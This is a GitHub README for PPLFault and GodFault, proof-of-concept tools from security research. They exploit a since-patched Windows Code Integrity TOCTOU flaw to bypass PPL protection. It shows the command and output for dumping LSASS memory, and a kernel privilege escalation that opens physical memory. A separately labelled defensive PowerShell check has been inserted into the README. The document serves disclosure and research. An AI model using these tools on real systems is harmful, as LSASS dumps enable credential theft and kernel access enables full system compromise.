GitHub: gabriellandau/PPLFault
Proof-of-concept tool that exploits a Windows Code Integrity TOCTOU vulnerability to bypass PPL protection and achieve kernel-level privilege escalation.
Stars: 564 | Forks: 82
# PPLFault
By [Gabriel Landau](https://twitter.com/GabrielLandau) of [Elastic Security](https://www.elastic.co/security-labs/).
From [PPLdump Is Dead. Long Live PPLdump!](https://www.blackhat.com/asia-23/briefings/schedule/#ppldump-is-dead-long-live-ppldump-31052), presented at [Black Hat Asia 2023](https://www.blackhat.com/asia-23).
[PPLdump Is Dead. Long Live PPLdump! (video)](http://www.youtube.com/watch?v=5xteW8Tm410)
## PPLFault
**2024-02 update: Microsoft patched PPLFault on 2024-02-13. See [this tweet](https://x.com/GabrielLandau/status/1757818200127946922?s=20) for discussion.**
Exploits a TOCTOU vulnerability in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light, then dumps the specified process. For more details on the vulnerability, see my [slides](http://i.blackhat.com/Asia-23/AS-23-Landau-PPLdump-Is-Dead-Long-Live-PPLdump.pdf) and/or [talk](https://x.com/GabrielLandau/status/1707773387731272085).
### Example output
```
PS C:\Users\user\Desktop> cmd /c ver
Microsoft Windows [Version 10.0.25346.1001]
PS C:\Users\user\Desktop> tasklist | findstr lsass
lsass.exe 992 Services 0 76,620 K
PS C:\Users\user\Desktop> (Get-NtProcess -Access QueryLimitedInformation -Pid 992).Protection
Type Signer
---- ------
ProtectedLight Lsa
PS C:\Users\user\Desktop> dir *.dmp
PS C:\Users\user\Desktop> .\PPLFault.exe -v 992 lsass.dmp
[+] No cleanup necessary. Backup does not exist.
[+] GetShellcode: 528 bytes of shellcode written over DLL entrypoint
[+] Benign: C:\Windows\System32\EventAggregation.dll.bak
[+] Payload: C:\PPLFaultTemp\PPLFaultPayload.dll
[+] Placeholder: C:\PPLFaultTemp\EventAggregationPH.dll
[+] Acquired exclusive oplock to file: C:\Windows\System32\devobj.dll
[+] Ready. Spawning WinTcb.
[+] SpawnPPL: Waiting for child process to finish.
[+] FetchDataCallback called.
[+] Hydrating 90112 bytes at offset 0
[+] Switching to payload
[+] Emptying system working set
[+] Working set purged
[+] Give the memory manager a moment to think
[+] Hydrating 90112 PAYLOAD bytes at offset 0
[+] Dump saved to: lsass.dmp
[+] Dump is 74.9 MB
[+] Operation took 937 ms
PS C:\Users\user\Desktop> dir *.dmp
Directory: C:\Users\user\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 5/1/2023 11:18 AM 78581973 lsass.dmp
```
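The sample session above reads the protection level of lsass.exe with `Get-NtProcess` from the NtObjectManager module. The following is an added defender-side check (not part of the PPLFault repository) that uses the same cmdlet to inventory every protected process on the host and to confirm that LSASS is running as ProtectedLight/Lsa with the `RunAsPPL` value set. It assumes the NtObjectManager module is installed and that the shell is elevated; the function and variable names are mine.

```powershell
# Added example, not code from the PPLFault project.
# Assumes: Install-Module NtObjectManager -Scope CurrentUser has been run,
# and the shell is elevated so that QueryLimitedInformation succeeds on PPLs.
Import-Module NtObjectManager

function Get-ProtectedProcessInventory {
    # QueryLimitedInformation is sufficient to read the protection level of a
    # protected process, so no PROCESS_ALL_ACCESS (and no PPL bypass) is needed.
    Get-NtProcess -Access QueryLimitedInformation |
        Where-Object { $_.Protection.Type -ne 'None' } |
        Select-Object ProcessId, Name,
            @{ Name = 'Type';   Expression = { $_.Protection.Type } },
            @{ Name = 'Signer'; Expression = { $_.Protection.Signer } }
}

function Test-LsassProtection {
    # Expected state on a hardened host: Type=ProtectedLight, Signer=Lsa,
    # and the RunAsPPL value present under the Lsa key (1 = enabled).
    $lsassPid = (Get-Process -Name lsass).Id
    $proc = Get-NtProcess -Access QueryLimitedInformation -Pid $lsassPid
    $runAsPpl = Get-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa' `
        -Name RunAsPPL -ErrorAction SilentlyContinue

    [pscustomobject]@{
        ProcessId        = $lsassPid
        ProtectionType   = $proc.Protection.Type
        ProtectionSigner = $proc.Protection.Signer
        RunAsPPLValue    = if ($runAsPpl) { $runAsPpl.RunAsPPL } else { $null }
        IsProtected      = ($proc.Protection.Type -eq 'ProtectedLight' -and
                            $proc.Protection.Signer -eq 'Lsa')
    }
    $proc.Close()
}

# Usage:
Get-ProtectedProcessInventory | Format-Table -AutoSize
Test-LsassProtection
```

`Get-ProtectedProcessInventory` lists every process whose `Protection.Type` is not `None`, which makes it easy to spot unexpected entries such as a process claiming a WinTcb or Lsa signer that is not a known Windows binary. `Test-LsassProtection` only reports configuration; as the README makes clear, a PPL configuration being in place does not by itself rule out the TOCTOU bypass on unpatched builds.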
## GodFault
Exploits the same TOCTOU vulnerability as PPLFault. Instead of dumping a process, it migrates into CSRSS and uses the `win32k!NtUserHardErrorControlCall` vulnerability from [ANGRYORCHARD](https://github.com/gabriellandau/ANGRYORCHARD/blob/0a4720f7e07e86a9ac2783411b81efac14938e26/Exploit.c#L69-L81) to decrement `KTHREAD.PreviousMode` from `UserMode` (1) to `KernelMode` (0). It demonstrates "god mode" access by opening `\Device\PhysicalMemory` with `SECTION_ALL_ACCESS`, which is normally inaccessible from `UserMode`.
### Example output
```
C:\Users\user\Desktop>GodFault.exe -v
[?] Server does not appear to be running. Attempting to install it...
[+] No cleanup necessary. Backup does not exist.
[+] GetShellcode: 2304 bytes of shellcode written over DLL entrypoint
[+] CSRSS PID is 772
[+] Benign: C:\Windows\System32\EventAggregation.dll.bak
[+] Payload: C:\GodFaultTemp\GodFaultPayload.dll
[+] Placeholder: C:\GodFaultTemp\EventAggregationPH.dll
[+] Acquired exclusive oplock to file: C:\Windows\System32\devobj.dll
[+] Testing initial ability to acquire PROCESS_ALL_ACCESS to System: Failure
[+] Ready. Spawning WinTcb.
[+] SpawnPPL: Waiting for child process to finish.
[+] FetchDataCallback called.
[+] Hydrating 90112 bytes at offset 0
[+] Switching to payload
[+] Emptying system working set
[+] Working set purged
[+] Give the memory manager a moment to think
[+] Hydrating 90112 PAYLOAD bytes at offset 0
[+] Thread 6248 (KTHREAD FFFFA283B0A62080) has been blessed
[+] Testing post-exploit ability to acquire PROCESS_ALL_ACCESS to System: Success
[+] Opened \Device\PhysicalMemory. Handle is 0x1b4
[+] Opened System process as PROCESS_ALL_ACCESS. Handle is 0x1c0
[+] Press any key to continue...
[+] No cleanup necessary. Backup does not exist.
```
## Python
A PoC achieving arbitrary code execution as WinTcb-Light without the CloudFilter API. See [python/README.md](python/README.md).
## Tested platforms
| | Windows 11 22H2 22621.1702 (May 2023) | Windows 11 Insider Canary 25346.1001 (April 2023) |
| - | - | - |
| PPLFault | ✔️ | ✔️ |
| GodFault | ✔️ | ❌ The Insider PreviousMode mitigation causes a [BSOD](https://twitter.com/GabrielLandau/status/1597001955909697536?s=20) |
# License
PPLFault is licensed under [ELv2](LICENSE.txt). It uses [phnt](https://github.com/winsiderss/systeminformer/tree/25846070780183848dc8d8f335a54fa6e636e281/phnt) from SystemInformer under the [MIT license](phnt/LICENSE.txt).
# Acknowledgements
Inspired by [PPLdump](https://github.com/itm4n/PPLdump) by [Clément Labro](https://infosec.exchange/@itm4n), which Microsoft [patched](https://itm4n.github.io/the-end-of-ppldump/) in July 2022.
[ANGRYORCHARD](https://github.com/gabriellandau/ANGRYORCHARD) was created by [Austin Hudson](https://twitter.com/ilove2pwn_) and released when Microsoft patched PPLdump.